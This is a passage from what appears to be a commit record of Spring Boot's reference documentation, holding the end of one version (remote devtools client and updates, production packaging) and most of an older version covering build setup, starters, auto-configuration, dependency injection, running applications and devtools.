`my-app` that you have deployed to Cloud Foundry, you would do the following:\n\n* Select `Run Configurations...` from the `Run` menu.\n* Create a new `Java Application` \"`launch configuration`\".\n* Browse for the `my-app` project.\n* Use `org.springframework.boot.devtools.RemoteSpringApplication` as the main class.\n* Add `+++https:\/\/myapp.cfapps.io+++` to the `Program arguments` (or whatever your remote URL is).\n\nA running remote client might resemble the following listing:\n\n[indent=0,subs=\"attributes\"]\n----\n\t . ____ _ __ _ _\n\t \/\\\\ \/ ___'_ __ _ _(_)_ __ __ _ ___ _ \\ \\ \\ \\\n\t( ( )\\___ | '_ | '_| | '_ \\\/ _` | | _ \\___ _ __ ___| |_ ___ \\ \\ \\ \\\n\t \\\\\/ ___)| |_)| | | | | || (_| []::::::[] \/ -_) ' \\\/ _ \\ _\/ -_) ) ) ) )\n\t ' |____| .__|_| |_|_| |_\\__, | |_|_\\___|_|_|_\\___\/\\__\\___|\/ \/ \/ \/\n\t =========|_|==============|___\/===================================\/_\/_\/_\/\n\t :: Spring Boot Remote :: {spring-boot-version}\n\n\t2015-06-10 18:25:06.632 INFO 14938 --- [ main] o.s.b.devtools.RemoteSpringApplication : Starting RemoteSpringApplication on pwmbp with PID 14938 (\/Users\/pwebb\/projects\/spring-boot\/code\/spring-boot-project\/spring-boot-devtools\/target\/classes started by pwebb in \/Users\/pwebb\/projects\/spring-boot\/code)\n\t2015-06-10 18:25:06.671 INFO 14938 --- [ main] s.c.a.AnnotationConfigApplicationContext : Refreshing org.springframework.context.annotation.AnnotationConfigApplicationContext@2a17b7b6: startup date [Wed Jun 10 18:25:06 PDT 2015]; root of context hierarchy\n\t2015-06-10 18:25:07.043 WARN 14938 --- [ main] o.s.b.d.r.c.RemoteClientConfiguration : The connection to http:\/\/localhost:8080 is insecure. You should use a URL starting with 'https:\/\/'.\n\t2015-06-10 18:25:07.074 INFO 14938 --- [ main] o.s.b.d.a.OptionalLiveReloadServer : LiveReload server is running on port 35729\n\t2015-06-10 18:25:07.130 INFO 14938 --- [ main] o.s.b.devtools.RemoteSpringApplication : Started RemoteSpringApplication in 0.74 seconds (JVM running for 1.105)\n----\n\nNOTE: Because the remote client is using the same classpath as the real application it can directly read application properties.\nThis is how the configprop:spring.devtools.remote.secret[] property is read and passed to the server for authentication.\n\nTIP: It is always advisable to use `https:\/\/` as the connection protocol, so that traffic is encrypted and passwords cannot be intercepted.\n\nTIP: If you need to use a proxy to access the remote application, configure the `spring.devtools.remote.proxy.host` and `spring.devtools.remote.proxy.port` properties.\n\n\n\n[[using-boot-devtools-remote-update]]\n==== Remote Update\nThe remote client monitors your application classpath for changes in the same way as the <<using-boot-devtools-restart,local restart>>.\nAny updated resource is pushed to the remote application and (_if required_) triggers a restart.\nThis can be helpful if you iterate on a feature that uses a cloud service that you do not have locally.\nGenerally, remote updates and restarts are much quicker than a full rebuild and deploy cycle.\n\nOn a slower development environment, it may happen that the quiet period is not enough, and the changes in the classes may be split into batches.\nThe server is restarted after the first batch of class changes is uploaded.\nThe next batch can\u2019t be sent to the application, since the server is restarting.\n\nThis is typically manifested by a warning in the `RemoteSpringApplication` logs about failing to upload some of the classes, and a consequent retry.\nBut it may also lead to application code inconsistency and failure to restart after the first batch of changes is uploaded.\nIf you observe such problems constantly, try increasing the `spring.devtools.restart.poll-interval` and `spring.devtools.restart.quiet-period` parameters to the values that fit your development environment.\nSee the <<configuring-file-system-watcher>> section for configuring these properties.\n\nNOTE: Files are only monitored when the remote client is running.\nIf you change a file before starting the remote client, it is not pushed to the remote server.\n\n\n\n[[using-boot-packaging-for-production]]\n== Packaging Your Application for Production\nExecutable jars can be used for production deployment.\nAs they are self-contained, they are also ideally suited for cloud-based deployment.\n\nFor additional \"`production ready`\" features, such as health, auditing, and metric REST or JMX end-points, consider adding `spring-boot-actuator`.\nSee _<<production-ready-features.adoc#production-ready>>_ for details.\n\n\n\n[[using-boot-whats-next]]\n== What to Read Next\nYou should now understand how you can use Spring Boot and some best practices that you should follow.\nYou can now go on to learn about specific _<<spring-boot-features#boot-features, Spring Boot features>>_ in depth, or you could skip ahead and read about the \"`<<production-ready-features#production-ready, production ready>>`\" aspects of Spring Boot.\n","old_contents":"[[using-boot]]\n= Using Spring Boot\ninclude::attributes.adoc[]\n\nThis section goes into more detail about how you should use Spring Boot.\nIt covers topics such as build systems, auto-configuration, and how to run your applications.\nWe also cover some Spring Boot best practices.\nAlthough there is nothing particularly special about Spring Boot (it is just another library that you can consume), there are a few recommendations that, when followed, make your development process a little easier.\n\nIf you are starting out with Spring Boot, you should probably read the _<<getting-started.adoc#getting-started, Getting Started>>_ guide before diving into this section.\n\n\n\n[[using-boot-build-systems]]\n== Build Systems\nIt is strongly recommended that you choose a build system that supports <<using-boot-dependency-management,_dependency management_>> and that can consume artifacts published to the \"`Maven Central`\" repository.\nWe would recommend that you choose Maven or Gradle.\nIt is possible to get Spring Boot to work with other build systems (Ant, for example), but they are not particularly well supported.\n\n\n\n[[using-boot-dependency-management]]\n=== Dependency Management\nEach release of Spring Boot provides a curated list of dependencies that it supports.\nIn practice, you do not need to provide a version for any of these dependencies in your build configuration, as Spring Boot manages that for you.\nWhen you upgrade Spring Boot itself, these dependencies are upgraded as well in a consistent way.\n\nNOTE: You can still specify a version and override Spring Boot's recommendations if you need to do so.\n\nThe curated list contains all the spring modules that you can use with Spring Boot as well as a refined list of third party libraries.\nThe list is available as a standard <<using-boot-maven-without-a-parent,Bills of Materials (`spring-boot-dependencies`)>> that can be used with both <<using-boot-maven-parent-pom,Maven>> and <<using-boot-gradle,Gradle>>.\n\nWARNING: Each release of Spring Boot is associated with a base version of the Spring Framework.\nWe **highly** recommend that you not specify its version.\n\n\n\n[[using-boot-maven]]\n=== Maven\nMaven users can inherit from the `spring-boot-starter-parent` project to obtain sensible defaults.\nThe parent project provides the following features:\n\n* Java 1.8 as the default compiler level.\n* UTF-8 source encoding.\n* A <<using-boot-dependency-management,Dependency Management section>>, inherited from the spring-boot-dependencies pom, that manages the versions of common dependencies.\nThis dependency management lets you omit <version> tags for those dependencies when used in your own pom.\n* An execution of the {spring-boot-maven-plugin-docs}\/repackage-mojo.html[`repackage` goal] with a `repackage` execution id.\n* Sensible https:\/\/maven.apache.org\/plugins\/maven-resources-plugin\/examples\/filter.html[resource filtering].\n* Sensible plugin configuration (https:\/\/www.mojohaus.org\/exec-maven-plugin\/[exec plugin], https:\/\/github.com\/ktoso\/maven-git-commit-id-plugin[Git commit ID], and https:\/\/maven.apache.org\/plugins\/maven-shade-plugin\/[shade]).\n* Sensible resource filtering for `application.properties` and `application.yml` including profile-specific files (for example, `application-dev.properties` and `application-dev.yml`)\n\nNote that, since the `application.properties` and `application.yml` files accept Spring style placeholders (`${...}`), the Maven filtering is changed to use `@..@` placeholders.\n(You can override that by setting a Maven property called `resource.delimiter`.)\n\n\n\n[[using-boot-maven-parent-pom]]\n==== Inheriting the Starter Parent\nTo configure your project to inherit from the `spring-boot-starter-parent`, set the `parent` as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<!-- Inherit defaults from Spring Boot -->\n\t<parent>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-parent<\/artifactId>\n\t\t<version>{spring-boot-version}<\/version>\n\t<\/parent>\n----\n\nNOTE: You should need to specify only the Spring Boot version number on this dependency.\nIf you import additional starters, you can safely omit the version number.\n\nWith that setup, you can also override individual dependencies by overriding a property in your own project.\nFor instance, to upgrade to another Spring Data release train, you would add the following to your `pom.xml`:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<spring-data-releasetrain.version>Fowler-SR2<\/spring-data-releasetrain.version>\n\t<\/properties>\n----\n\nTIP: Check the {spring-boot-code}\/spring-boot-project\/spring-boot-dependencies\/pom.xml[`spring-boot-dependencies` pom] for a list of supported properties.\n\n\n\n[[using-boot-maven-without-a-parent]]\n==== Using Spring Boot without the Parent POM\nNot everyone likes inheriting from the `spring-boot-starter-parent` POM.\nYou may have your own corporate standard parent that you need to use or you may prefer to explicitly declare all your Maven configuration.\n\nIf you do not want to use the `spring-boot-starter-parent`, you can still keep the benefit of the dependency management (but not the plugin management) by using a `scope=import` dependency, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependencyManagement>\n\t\t<dependencies>\n\t\t\t<dependency>\n\t\t\t\t<!-- Import dependency management from Spring Boot -->\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-dependencies<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<type>pom<\/type>\n\t\t\t\t<scope>import<\/scope>\n\t\t\t<\/dependency>\n\t\t<\/dependencies>\n\t<\/dependencyManagement>\n----\n\nThe preceding sample setup does not let you override individual dependencies by using a property, as explained above.\nTo achieve the same result, you need to add an entry in the `dependencyManagement` of your project **before** the `spring-boot-dependencies` entry.\nFor instance, to upgrade to another Spring Data release train, you could add the following element to your `pom.xml`:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependencyManagement>\n\t\t<dependencies>\n\t\t\t<!-- Override Spring Data release train provided by Spring Boot -->\n\t\t\t<dependency>\n\t\t\t\t<groupId>org.springframework.data<\/groupId>\n\t\t\t\t<artifactId>spring-data-releasetrain<\/artifactId>\n\t\t\t\t<version>Moore-SR10<\/version>\n\t\t\t\t<type>pom<\/type>\n\t\t\t\t<scope>import<\/scope>\n\t\t\t<\/dependency>\n\t\t\t<dependency>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-dependencies<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<type>pom<\/type>\n\t\t\t\t<scope>import<\/scope>\n\t\t\t<\/dependency>\n\t\t<\/dependencies>\n\t<\/dependencyManagement>\n----\n\nNOTE: In the preceding example, we specify a _BOM_, but any dependency type can be overridden in the same way.\n\n\n\n[[using-boot-maven-plugin]]\n==== Using the Spring Boot Maven Plugin\nSpring Boot includes a <<build-tool-plugins.adoc#build-tool-plugins-maven-plugin, Maven plugin>> that can package the project as an executable jar.\nAdd the plugin to your `<plugins>` section if you want to use it, as shown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nNOTE: If you use the Spring Boot starter parent pom, you need to add only the plugin.\nThere is no need to configure it unless you want to change the settings defined in the parent.\n\n\n\n[[using-boot-gradle]]\n=== Gradle\nTo learn about using Spring Boot with Gradle, please refer to the documentation for Spring Boot's Gradle plugin:\n\n* Reference ({spring-boot-gradle-plugin-docs}[HTML] and {spring-boot-gradle-plugin-pdfdocs}[PDF])\n* {spring-boot-gradle-plugin-api}[API]\n\n\n\n[[using-boot-ant]]\n=== Ant\nIt is possible to build a Spring Boot project using Apache Ant+Ivy.\nThe `spring-boot-antlib` \"`AntLib`\" module is also available to help Ant create executable jars.\n\nTo declare dependencies, a typical `ivy.xml` file looks something like the following example:\n\n[source,xml,indent=0]\n----\n\t<ivy-module version=\"2.0\">\n\t\t<info organisation=\"org.springframework.boot\" module=\"spring-boot-sample-ant\" \/>\n\t\t<configurations>\n\t\t\t<conf name=\"compile\" description=\"everything needed to compile this module\" \/>\n\t\t\t<conf name=\"runtime\" extends=\"compile\" description=\"everything needed to run this module\" \/>\n\t\t<\/configurations>\n\t\t<dependencies>\n\t\t\t<dependency org=\"org.springframework.boot\" name=\"spring-boot-starter\"\n\t\t\t\trev=\"${spring-boot.version}\" conf=\"compile\" \/>\n\t\t<\/dependencies>\n\t<\/ivy-module>\n----\n\nA typical `build.xml` looks like the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<project\n\t\txmlns:ivy=\"antlib:org.apache.ivy.ant\"\n\t\txmlns:spring-boot=\"antlib:org.springframework.boot.ant\"\n\t\tname=\"myapp\" default=\"build\">\n\n\t\t<property name=\"spring-boot.version\" value=\"{spring-boot-version}\" \/>\n\n\t\t<target name=\"resolve\" description=\"--> retrieve dependencies with ivy\">\n\t\t\t<ivy:retrieve pattern=\"lib\/[conf]\/[artifact]-[type]-[revision].[ext]\" \/>\n\t\t<\/target>\n\n\t\t<target name=\"classpaths\" depends=\"resolve\">\n\t\t\t<path id=\"compile.classpath\">\n\t\t\t\t<fileset dir=\"lib\/compile\" includes=\"*.jar\" \/>\n\t\t\t<\/path>\n\t\t<\/target>\n\n\t\t<target name=\"init\" depends=\"classpaths\">\n\t\t\t<mkdir dir=\"build\/classes\" \/>\n\t\t<\/target>\n\n\t\t<target name=\"compile\" depends=\"init\" description=\"compile\">\n\t\t\t<javac srcdir=\"src\/main\/java\" destdir=\"build\/classes\" classpathref=\"compile.classpath\" \/>\n\t\t<\/target>\n\n\t\t<target name=\"build\" depends=\"compile\">\n\t\t\t<spring-boot:exejar destfile=\"build\/myapp.jar\" classes=\"build\/classes\">\n\t\t\t\t<spring-boot:lib>\n\t\t\t\t\t<fileset dir=\"lib\/runtime\" \/>\n\t\t\t\t<\/spring-boot:lib>\n\t\t\t<\/spring-boot:exejar>\n\t\t<\/target>\n\t<\/project>\n----\n\nTIP: If you do not want to use the `spring-boot-antlib` module, see the _<<howto.adoc#howto-build-an-executable-archive-with-ant>>_ \"`How-to`\" .\n\n\n\n[[using-boot-starter]]\n=== Starters\nStarters are a set of convenient dependency descriptors that you can include in your application.\nYou get a one-stop shop for all the Spring and related technologies that you need without having to hunt through sample code and copy-paste loads of dependency descriptors.\nFor example, if you want to get started using Spring and JPA for database access, include the `spring-boot-starter-data-jpa` dependency in your project.\n\nThe starters contain a lot of the dependencies that you need to get a project up and running quickly and with a consistent, supported set of managed transitive dependencies.\n\n.What's in a name\n****\nAll **official** starters follow a similar naming pattern; `+spring-boot-starter-*+`, where `+*+` is a particular type of application.\nThis naming structure is intended to help when you need to find a starter.\nThe Maven integration in many IDEs lets you search dependencies by name.\nFor example, with the appropriate Eclipse or STS plugin installed, you can press `ctrl-space` in the POM editor and type \"`spring-boot-starter`\" for a complete list.\n\nAs explained in the \"`<<spring-boot-features#boot-features-custom-starter,Creating Your Own Starter>>`\" section, third party starters should not start with `spring-boot`, as it is reserved for official Spring Boot artifacts.\nRather, a third-party starter typically starts with the name of the project.\nFor example, a third-party starter project called `thirdpartyproject` would typically be named `thirdpartyproject-spring-boot-starter`.\n****\n\nThe following application starters are provided by Spring Boot under the `org.springframework.boot` group:\n\n.Spring Boot application starters\ninclude::{generated-resources-root}\/application-starters.adoc[]\n\nIn addition to the application starters, the following starters can be used to add _<<production-ready-features.adoc#production-ready, production ready>>_ features:\n\n.Spring Boot production starters\ninclude::{generated-resources-root}\/production-starters.adoc[]\n\nFinally, Spring Boot also includes the following starters that can be used if you want to exclude or swap specific technical facets:\n\n.Spring Boot technical starters\ninclude::{generated-resources-root}\/technical-starters.adoc[]\n\nTo learn how to swap technical facets, please see the how-to documentation for <<howto.adoc#howto-use-another-web-server, swapping web server>> and <<howto.adoc#howto-configure-log4j-for-logging, logging system>>.\n\nTIP: For a list of additional community contributed starters, see the {spring-boot-master-code}\/spring-boot-project\/spring-boot-starters\/README.adoc[README file] in the `spring-boot-starters` module on GitHub.\n\n\n\n[[using-boot-structuring-your-code]]\n== Structuring Your Code\nSpring Boot does not require any specific code layout to work.\nHowever, there are some best practices that help.\n\n\n\n[[using-boot-using-the-default-package]]\n=== Using the \"`default`\" Package\nWhen a class does not include a `package` declaration, it is considered to be in the \"`default package`\".\nThe use of the \"`default package`\" is generally discouraged and should be avoided.\nIt can cause particular problems for Spring Boot applications that use the `@ComponentScan`, `@ConfigurationPropertiesScan`, `@EntityScan`, or `@SpringBootApplication` annotations, since every class from every jar is read.\n\nTIP: We recommend that you follow Java's recommended package naming conventions and use a reversed domain name (for example, `com.example.project`).\n\n\n\n[[using-boot-locating-the-main-class]]\n=== Locating the Main Application Class\nWe generally recommend that you locate your main application class in a root package above other classes.\nThe <<using-boot-using-springbootapplication-annotation, `@SpringBootApplication` annotation>> is often placed on your main class, and it implicitly defines a base \"`search package`\" for certain items.\nFor example, if you are writing a JPA application, the package of the `@SpringBootApplication` annotated class is used to search for `@Entity` items.\nUsing a root package also allows component scan to apply only on your project.\n\nTIP: If you don't want to use `@SpringBootApplication`, the `@EnableAutoConfiguration` and `@ComponentScan` annotations that it imports defines that behaviour so you can also use those instead.\n\nThe following listing shows a typical layout:\n\n[indent=0]\n----\n\tcom\n\t +- example\n\t +- myapplication\n\t +- Application.java\n\t |\n\t +- customer\n\t | +- Customer.java\n\t | +- CustomerController.java\n\t | +- CustomerService.java\n\t | +- CustomerRepository.java\n\t |\n\t +- order\n\t +- Order.java\n\t +- OrderController.java\n\t +- OrderService.java\n\t +- OrderRepository.java\n----\n\nThe `Application.java` file would declare the `main` method, along with the basic `@SpringBootApplication`, as follows:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapplication;\n\n\timport org.springframework.boot.SpringApplication;\n\timport org.springframework.boot.autoconfigure.SpringBootApplication;\n\n\t@SpringBootApplication\n\tpublic class Application {\n\n\t\tpublic static void main(String[] args) {\n\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n----\n\n\n\n[[using-boot-configuration-classes]]\n== Configuration Classes\nSpring Boot favors Java-based configuration.\nAlthough it is possible to use `SpringApplication` with XML sources, we generally recommend that your primary source be a single `@Configuration` class.\nUsually the class that defines the `main` method is a good candidate as the primary `@Configuration`.\n\nTIP: Many Spring configuration examples have been published on the Internet that use XML configuration.\nIf possible, always try to use the equivalent Java-based configuration.\nSearching for `+Enable*+` annotations can be a good starting point.\n\n\n\n[[using-boot-importing-configuration]]\n=== Importing Additional Configuration Classes\nYou need not put all your `@Configuration` into a single class.\nThe `@Import` annotation can be used to import additional configuration classes.\nAlternatively, you can use `@ComponentScan` to automatically pick up all Spring components, including `@Configuration` classes.\n\n\n\n[[using-boot-importing-xml-configuration]]\n=== Importing XML Configuration\nIf you absolutely must use XML based configuration, we recommend that you still start with a `@Configuration` class.\nYou can then use an `@ImportResource` annotation to load XML configuration files.\n\n\n\n[[using-boot-auto-configuration]]\n== Auto-configuration\nSpring Boot auto-configuration attempts to automatically configure your Spring application based on the jar dependencies that you have added.\nFor example, if `HSQLDB` is on your classpath, and you have not manually configured any database connection beans, then Spring Boot auto-configures an in-memory database.\n\nYou need to opt-in to auto-configuration by adding the `@EnableAutoConfiguration` or `@SpringBootApplication` annotations to one of your `@Configuration` classes.\n\nTIP: You should only ever add one `@SpringBootApplication` or `@EnableAutoConfiguration` annotation.\nWe generally recommend that you add one or the other to your primary `@Configuration` class only.\n\n\n\n[[using-boot-replacing-auto-configuration]]\n=== Gradually Replacing Auto-configuration\nAuto-configuration is non-invasive.\nAt any point, you can start to define your own configuration to replace specific parts of the auto-configuration.\nFor example, if you add your own `DataSource` bean, the default embedded database support backs away.\n\nIf you need to find out what auto-configuration is currently being applied, and why, start your application with the `--debug` switch.\nDoing so enables debug logs for a selection of core loggers and logs a conditions report to the console.\n\n\n\n[[using-boot-disabling-specific-auto-configuration]]\n=== Disabling Specific Auto-configuration Classes\nIf you find that specific auto-configuration classes that you do not want are being applied, you can use the exclude attribute of `@SpringBootApplication` to disable them, as shown in the following example:\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.autoconfigure.*;\n\timport org.springframework.boot.autoconfigure.jdbc.*;\n\n\t@SpringBootApplication(exclude={DataSourceAutoConfiguration.class})\n\tpublic class MyApplication {\n\t}\n----\n\nIf the class is not on the classpath, you can use the `excludeName` attribute of the annotation and specify the fully qualified name instead.\nIf you prefer to use `@EnableAutoConfiguration` rather than `@SpringBootApplication`, `exclude` and `excludeName` are also available.\nFinally, you can also control the list of auto-configuration classes to exclude by using the configprop:spring.autoconfigure.exclude[] property.\n\nTIP: You can define exclusions both at the annotation level and by using the property.\n\nNOTE: Even though auto-configuration classes are `public`, the only aspect of the class that is considered public API is the name of the class which can be used for disabling the auto-configuration.\nThe actual contents of those classes, such as nested configuration classes or bean methods are for internal use only and we do not recommend using those directly.\n\n\n\n[[using-boot-spring-beans-and-dependency-injection]]\n== Spring Beans and Dependency Injection\nYou are free to use any of the standard Spring Framework techniques to define your beans and their injected dependencies.\nWe often find that using `@ComponentScan` (to find your beans) and using `@Autowired` (to do constructor injection) works well.\n\nIf you structure your code as suggested above (locating your application class in a root package), you can add `@ComponentScan` without any arguments.\nAll of your application components (`@Component`, `@Service`, `@Repository`, `@Controller` etc.) are automatically registered as Spring Beans.\n\nThe following example shows a `@Service` Bean that uses constructor injection to obtain a required `RiskAssessor` bean:\n\n[source,java,indent=0]\n----\n\tpackage com.example.service;\n\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.stereotype.Service;\n\n\t@Service\n\tpublic class DatabaseAccountService implements AccountService {\n\n\t\tprivate final RiskAssessor riskAssessor;\n\n\t\t@Autowired\n\t\tpublic DatabaseAccountService(RiskAssessor riskAssessor) {\n\t\t\tthis.riskAssessor = riskAssessor;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf a bean has one constructor, you can omit the `@Autowired`, as shown in the following example:\n\n[source,java,indent=0]\n----\n\t@Service\n\tpublic class DatabaseAccountService implements AccountService {\n\n\t\tprivate final RiskAssessor riskAssessor;\n\n\t\tpublic DatabaseAccountService(RiskAssessor riskAssessor) {\n\t\t\tthis.riskAssessor = riskAssessor;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nTIP: Notice how using constructor injection lets the `riskAssessor` field be marked as `final`, indicating that it cannot be subsequently changed.\n\n\n\n[[using-boot-using-springbootapplication-annotation]]\n== Using the @SpringBootApplication Annotation\nMany Spring Boot developers like their apps to use auto-configuration, component scan and be able to define extra configuration on their \"application class\".\nA single `@SpringBootApplication` annotation can be used to enable those three features, that is:\n\n* `@EnableAutoConfiguration`: enable <<using-boot-auto-configuration,Spring Boot's auto-configuration mechanism>>\n* `@ComponentScan`: enable `@Component` scan on the package where the application is located (see <<using-boot-structuring-your-code,the best practices>>)\n* `@Configuration`: allow to register extra beans in the context or import additional configuration classes\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapplication;\n\n\timport org.springframework.boot.SpringApplication;\n\timport org.springframework.boot.autoconfigure.SpringBootApplication;\n\n\t@SpringBootApplication \/\/ same as @Configuration @EnableAutoConfiguration @ComponentScan\n\tpublic class Application {\n\n\t\tpublic static void main(String[] args) {\n\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n----\n\nNOTE: `@SpringBootApplication` also provides aliases to customize the attributes of `@EnableAutoConfiguration` and `@ComponentScan`.\n\n[NOTE]\n====\nNone of these features are mandatory and you may choose to replace this single annotation by any of the features that it enables.\nFor instance, you may not want to use component scan or configuration properties scan in your application:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapplication;\n\n\timport org.springframework.boot.SpringApplication;\n\timport org.springframework.context.annotation.ComponentScan\n\timport org.springframework.context.annotation.Configuration;\n\timport org.springframework.context.annotation.Import;\n\n\t@Configuration(proxyBeanMethods = false)\n\t@EnableAutoConfiguration\n\t@Import({ MyConfig.class, MyAnotherConfig.class })\n\tpublic class Application {\n\n\t\tpublic static void main(String[] args) {\n\t\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n----\n\nIn this example, `Application` is just like any other Spring Boot application except that `@Component`-annotated classes and `@ConfigurationProperties`-annotated classes are not detected automatically and the user-defined beans are imported explicitly (see `@Import`).\n====\n\n\n\n[[using-boot-running-your-application]]\n== Running Your Application\nOne of the biggest advantages of packaging your application as a jar and using an embedded HTTP server is that you can run your application as you would any other.\nThe sample applies to debugging Spring Boot applications.\nYou do not need any special IDE plugins or extensions.\n\nNOTE: This section only covers jar based packaging.\nIf you choose to package your application as a war file, you should refer to your server and IDE documentation.\n\n\n\n[[using-boot-running-from-an-ide]]\n=== Running from an IDE\nYou can run a Spring Boot application from your IDE as a Java application.\nHowever, you first need to import your project.\nImport steps vary depending on your IDE and build system.\nMost IDEs can import Maven projects directly.\nFor example, Eclipse users can select `Import...` -> `Existing Maven Projects` from the `File` menu.\n\nIf you cannot directly import your project into your IDE, you may be able to generate IDE metadata by using a build plugin.\nMaven includes plugins for https:\/\/maven.apache.org\/plugins\/maven-eclipse-plugin\/[Eclipse] and https:\/\/maven.apache.org\/plugins\/maven-idea-plugin\/[IDEA].\nGradle offers plugins for {gradle-docs}\/userguide.html[various IDEs].\n\nTIP: If you accidentally run a web application twice, you see a \"`Port already in use`\" error.\nSTS users can use the `Relaunch` button rather than the `Run` button to ensure that any existing instance is closed.\n\n\n\n[[using-boot-running-as-a-packaged-application]]\n=== Running as a Packaged Application\nIf you use the Spring Boot Maven or Gradle plugins to create an executable jar, you can run your application using `java -jar`, as shown in the following example:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ java -jar target\/myapplication-0.0.1-SNAPSHOT.jar\n----\n\nIt is also possible to run a packaged application with remote debugging support enabled.\nDoing so lets you attach a debugger to your packaged application, as shown in the following example:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ java -Xdebug -Xrunjdwp:server=y,transport=dt_socket,address=8000,suspend=n \\\n\t -jar target\/myapplication-0.0.1-SNAPSHOT.jar\n----\n\n\n\n[[using-boot-running-with-the-maven-plugin]]\n=== Using the Maven Plugin\nThe Spring Boot Maven plugin includes a `run` goal that can be used to quickly compile and run your application.\nApplications run in an exploded form, as they do in your IDE.\nThe following example shows a typical Maven command to run a Spring Boot application:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ mvn spring-boot:run\n----\n\nYou might also want to use the `MAVEN_OPTS` operating system environment variable, as shown in the following example:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ export MAVEN_OPTS=-Xmx1024m\n----\n\n\n\n[[using-boot-running-with-the-gradle-plugin]]\n=== Using the Gradle Plugin\nThe Spring Boot Gradle plugin also includes a `bootRun` task that can be used to run your application in an exploded form.\nThe `bootRun` task is added whenever you apply the `org.springframework.boot` and `java` plugins and is shown in the following example:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ gradle bootRun\n----\n\nYou might also want to use the `JAVA_OPTS` operating system environment variable, as shown in the following example:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ export JAVA_OPTS=-Xmx1024m\n----\n\n\n\n[[using-boot-hot-swapping]]\n=== Hot Swapping\nSince Spring Boot applications are plain Java applications, JVM hot-swapping should work out of the box.\nJVM hot swapping is somewhat limited with the bytecode that it can replace.\nFor a more complete solution, https:\/\/www.jrebel.com\/products\/jrebel[JRebel] can be used.\n\nThe `spring-boot-devtools` module also includes support for quick application restarts.\nSee the <<using-boot-devtools>> section later in this chapter and the <<howto.adoc#howto-hotswapping, Hot swapping \"`How-to`\">> for details.\n\n\n\n[[using-boot-devtools]]\n== Developer Tools\nSpring Boot includes an additional set of tools that can make the application development experience a little more pleasant.\nThe `spring-boot-devtools` module can be included in any project to provide additional development-time features.\nTo include devtools support, add the module dependency to your build, as shown in the following listings for Maven and Gradle:\n\n.Maven\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependencies>\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-devtools<\/artifactId>\n\t\t\t<optional>true<\/optional>\n\t\t<\/dependency>\n\t<\/dependencies>\n----\n\n.Gradle\n[source,groovy,indent=0,subs=\"attributes\"]\n----\n\tconfigurations {\n\t\tdevelopmentOnly\n\t\truntimeClasspath {\n\t\t\textendsFrom developmentOnly\n\t\t}\n\t}\n\tdependencies {\n\t\tdevelopmentOnly(\"org.springframework.boot:spring-boot-devtools\")\n\t}\n----\n\nNOTE: Developer tools are automatically disabled when running a fully packaged application.\nIf your application is launched from `java -jar` or if it is started from a special classloader, then it is considered a \"`production application`\".\nIf that does not apply to you (i.e. if you run your application from a container), consider excluding devtools or set the `-Dspring.devtools.restart.enabled=false` system property.\n\nTIP: Flagging the dependency as optional in Maven or using a custom `developmentOnly` configuration in Gradle (as shown above) is a best practice that prevents devtools from being transitively applied to other modules that use your project.\n\nTIP: Repackaged archives do not contain devtools by default.\nIf you want to use a <<using-boot-devtools-remote,certain remote devtools feature>>, you need to disable the `excludeDevtools` build property to include it.\nThe property is supported with both the Maven and Gradle plugins.\n\n\n\n[[using-boot-devtools-property-defaults]]\n=== Property Defaults\nSeveral of the libraries supported by Spring Boot use caches to improve performance.\nFor example, <<spring-boot-features#boot-features-spring-mvc-template-engines,template engines>> cache compiled templates to avoid repeatedly parsing template files.\nAlso, Spring MVC can add HTTP caching headers to responses when serving static resources.\n\nWhile caching is very beneficial in production, it can be counter-productive during development, preventing you from seeing the changes you just made in your application.\nFor this reason, spring-boot-devtools disables the caching options by default.\n\nCache options are usually configured by settings in your `application.properties` file.\nFor example, Thymeleaf offers the configprop:spring.thymeleaf.cache[] property.\nRather than needing to set these properties manually, the `spring-boot-devtools` module automatically applies sensible development-time configuration.\n\nBecause you need more information about web requests while developing Spring MVC and Spring WebFlux applications, developer tools will enable `DEBUG` logging for the `web` logging group.\nThis will give you information about the incoming request, which handler is processing it, the response outcome, etc.\nIf you wish to log all request details (including potentially sensitive information), you can turn on the configprop:spring.http.log-request-details[] configuration property.\n\nNOTE: If you don't want property defaults to be applied you can set configprop:spring.devtools.add-properties[] to `false` in your `application.properties`.\n\nTIP: For a complete list of the properties that are 